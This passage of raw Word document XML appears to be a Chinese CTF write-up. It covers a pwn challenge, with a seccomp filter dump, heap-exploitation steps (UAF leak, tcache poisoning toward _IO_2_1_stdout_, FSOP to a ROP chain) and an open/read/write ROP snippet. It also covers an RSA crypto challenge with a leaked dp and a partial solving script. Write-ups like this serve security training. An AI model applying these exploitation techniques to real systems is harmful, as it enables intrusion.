    <w:p w14:paraId="39797CB8" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B277F0" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0005: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAFE48A" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0006: 0x15 0x01 0x00 0x00000101  if (A == openat) goto 0008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF5E5E" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67342CFD" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0008: 0x06 0x00 0x00 0x00000000  return KILL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AED507" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F55B1" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>泄露堆地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：通过UAF残留指针打印unsorted bin地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F75392" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>构造fake chunk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：利用堆溢出修改tcache的next指针指向_IO_2_1_stdout_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DF3F0" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>劫持控制流</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：通过修改_IO_write_ptr触发_IO_flush_all_lockp执行ROP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794073E" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ORW链构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：用open/read/write读取flag（需绕过沙箱）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6B32F" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXP技术点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174EDDC" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5FE51" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t># 构造ORW链示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758A4AC1" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>rop = ROP(libc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5562CC71" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>rop.open(flag_addr, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49EE7B" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>rop.read(3, heap_base+0x200, 0x100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114EBFF3" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>rop.write(1, heap_base+0x200, 0x100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152689E6" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284EE03" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB9812" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>$ ls -l /flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D563849" w14:textId="40EF5AC9" w:rsidR="008F4F4A" w:rsidRPr="008F4F4A" w:rsidRDefault="00AB4F98" w:rsidP="008F4F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>-r-------- 1 root root 36 Feb 18 23:59 /flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CCB018" w14:textId="7101DA19" w:rsidR="00EF2B0A" w:rsidRDefault="00EF2B0A" w:rsidP="00EF2B0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc190815133"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7A25A65A" w14:textId="07179A6F" w:rsidR="00F815A2" w:rsidRDefault="00F815A2" w:rsidP="00F815A2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc190815134"/>
      <w:r w:rsidRPr="00F815A2">
        <w:t>dp的背叛</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="000758B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(已出完)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79D0F6" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52718B" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>情报部门截获敌方加密通信：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DAA4DC" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>n = 0xbe2bac35d7e8a4aafc4585a8f5f3d3f3...（2048位十六进制数）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F34AB6" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>e = 65537</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E860A32" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>c = 0x56a3b88be1e6b8bdde4153a5d38a5...（密文）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77421772" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>附加情报：敌方程序员意外泄露dp = 0x74b4fc7d3c70a5d4c...（d mod (p-1)）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A7736" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Flag格式</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>：flag{解密后的明文字符串}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C23C5" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="00000000" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="32153725">
          <v:rect id="_x0000_i1025" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C4E52D" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98DA6B" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>已知dp = d mod (p-1)，可通过以下数学关系破解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F002A5E" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>由定义得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466166B" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dp</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>≡1mod(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>−</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76B82D" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>变形为存在整数k使得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04845DC2" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dp</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>−</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>1=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>−</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D92EC" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>通过遍历k值（通常k在[1, e]范围内）计算候选p：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA5175" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ke</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dp</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>−</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6C70">
        <w:t>+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3DAA8" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>验证候选p是否能整除n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908411C" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="00000000" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="72F16200">
          <v:rect id="_x0000_i1026" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6C689" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>解题脚本示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB36CE" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA27027" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>import gmpy2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5509F" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE2D667" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>n = 0xbe2bac35d7e8a4aafc4585a8f5f3d3f3...  # 替换实际n值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654803F5" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>e = 65537</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCC657" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>dp = 0x74b4fc7d3c70a5d4c...  # 替换实际dp值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1C681" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>c = 0x56a3b88be1e6b8bdde4153a5d38a5...  # 替换实际c值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188926F8" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A8C558" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t>for k in range(1, e+1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7A539" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">    if (e*dp -1) % k == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A56E5" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">        p = (e*dp -1) // k + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F646B34" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">        if n % p == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7185D4" w14:textId="77777777" w:rsidR="005F6C70" w:rsidRPr="005F6C70" w:rsidRDefault="005F6C70" w:rsidP="005F6C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6C70">
        <w:t xml:space="preserve">            q = n // p</w:t>
      </w:r>
    </w:p>
